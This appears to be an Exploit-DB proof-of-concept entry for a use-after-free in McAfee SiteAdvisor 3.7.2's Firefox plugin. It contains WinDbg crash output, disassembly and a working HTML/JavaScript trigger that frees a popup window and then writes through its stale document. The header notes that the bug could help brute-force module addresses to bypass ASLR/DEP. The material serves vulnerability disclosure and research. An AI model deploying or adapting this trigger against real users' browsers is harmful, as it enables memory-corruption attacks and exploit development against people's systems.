McAfee SiteAdvisor 3.7.2 – Firefox Use-After-Free (PoC)

  • 作者: Marcin Ressel
    日期: 2015-07-01
  • 来源:https://www.exploit-db.com/exploits/37456/
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
    <html>
    <head>
    <meta http-equiv="content-type" content="text/html; charset=windows-1250">
    <meta name="generator" content="PSPad editor, www.pspad.com">
    <title>McAfee SiteAdvisor 3.7.2 for firefox Use After Free Poc</title>
    </head>
    <body>
    <script>
    
    /*
    Title: McAfee SiteAdvisor 3.7.2 (firefox) Use After Free
    Author: Marcin Ressel
    Twitter: https://twitter.com/m_ressel
    NPMcFFPlg32.dll
    McAfee SiteAdvisor 3.7.2
    Tested on: Windows 8.1 (x64) and firefox 38.0.5
    Homepage: https://www.siteadvisor.com/
    
    Note: this vulnerability potentially gives an attacker the ability to brute-force module base
    addresses in memory to bypass ASLR/DEP, because the bug has no negative impact on the
    web-browser process - i.e. Firefox does not crash after the UAF is triggered in the McAfee
    plugin (the access violation below is observed with page heap enabled; see the !gflag output).
    
    0:107> !gflag
    Current NtGlobalFlag contents: 0x02001800
    htg - Enable heap tagging
    ust - Create user mode stack trace database
    hpa - Place heap allocations at ends of pages
    
    0:107> g
    (1d68.1b54): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=24b9efec ebx=00000000 ecx=00000000 edx=003bf030 esi=1a978ff0 edi=00000001
    eip=6f404391 esp=003bf014 ebp=003bf054 iopl=0 nv up ei pl zr na pe nc
    cs=0023ss=002bds=002bes=002bfs=0053gs=002b efl=00210246
    NPMcFFPlg32!CreateFFScriptable+0x141:
    6f404391 8b4008mov eax,dword ptr [eax+8] ds:002b:24b9eff4=????????
    
    ...
    6f40437a 8b02mov eax,dword ptr [edx]
    6f40437c 85c0testeax,eax
    6f40437e 7402jeNPMcFFPlg32!CreateFFScriptable+0x132 (6f404382)
    6f404380 8b00mov eax,dword ptr [eax]
    6f404382 8b4808mov ecx,dword ptr [eax+8]
    6f404385 8b4004mov eax,dword ptr [eax+4]
    6f404388 49dec ecx
    6f404389 234a08and ecx,dword ptr [edx+8]
    6f40438c 8b0488mov eax,dword ptr [eax+ecx*4]
    6f40438f 8b00mov eax,dword ptr [eax]
    6f404391 8b4008mov eax,dword ptr [eax+8] ds:002b:24b9eff4=????????
    6f404394 eb45jmp NPMcFFPlg32!CreateFFScriptable+0x18b (6f4043db)
    6f404396 8d45d0lea eax,[ebp-30h]
    6f404399 50pusheax
    6f40439a e8d10e0000callNPMcFFPlg32!CreateFFScriptable+0x1020 (6f405270)
    6f40439f 8bd0mov edx,eax
    6f4043a1 8b02mov eax,dword ptr [edx]
    6f4043a3 85c0testeax,eax
    6f4043a5 7402jeNPMcFFPlg32!CreateFFScriptable+0x159 (6f4043a9)
    6f4043a7 8b00mov eax,dword ptr [eax]
    6f4043a9 8b4808mov ecx,dword ptr [eax+8]
    6f4043ac 8b4004mov eax,dword ptr [eax+4]
    6f4043af 49dec ecx
    6f4043b0 234a08and ecx,dword ptr [edx+8]
    6f4043b3 8b3488mov esi,dword ptr [eax+ecx*4]
    6f4043b6 8d45c4lea eax,[ebp-3Ch]
    6f4043b9 50pusheax
    6f4043ba e8b10e0000callNPMcFFPlg32!CreateFFScriptable+0x1020 (6f405270)
    6f4043bf 8bd0mov edx,eax
    ...
    
    */
    
    // Handle to the popup opened at the bottom of this script; crash() reads it.
    // The PoC depends on window.open() actually returning a window (popup blocker off).
    var win = null;
    
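    /**
     * Trigger the use-after-free in the SiteAdvisor Firefox plugin.
     *
     * Keeps a JS reference to the popup's document, closes the popup (the
     * "free"), then writes to every string-valued property still reachable
     * through the stale document reference (the "use"). Per the debugger
     * trace in the header, one of those writes ends up in
     * NPMcFFPlg32!CreateFFScriptable dereferencing freed memory.
     *
     * Reads the file-level `win` set by window.open(); returns nothing.
     * `var` is kept deliberately: the target (Firefox 38) predates reliable
     * let/const support in plain scripts.
     */
    function crash()
    {
     // Hold the document so it outlives the window that owns it.
     var doc = win.document;
     win.close();

     // for...in on purpose (not Object.keys): inherited properties must be
     // walked too, exactly as the original PoC did.
     for (var p in doc)
     {
      if (typeof doc[p] === 'string')
      {
       // Accessors on a closed window's document may throw; swallowing is
       // intentional so the walk continues to the property that hits the plugin.
       try { doc[p] = "CCCC"; } catch (err) { /* expected on a closed window */ }
      }
     }
    }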
    
    // Open a tiny popup on an empty data: document and run crash() once it has loaded.
    // The popup blocker must be disabled: otherwise window.open() returns null and the
    // onload assignment below throws a TypeError before anything is triggered.
    // NOTE(review): if the (empty) document finishes loading before onload is assigned,
    // the handler never fires; a setTimeout fallback may be needed - confirm on target.
    // NOTE(review): newer Firefox releases refuse top-level data: navigations from
    // window.open(); the header states Firefox 38.0.5 as the tested version - confirm.
    win = window.open('data:text/html,','','width=20,height=20'); // popup blocker must be disabled
    win.onload = crash;
     
     
     
    </script>
    
    </body>
    </html>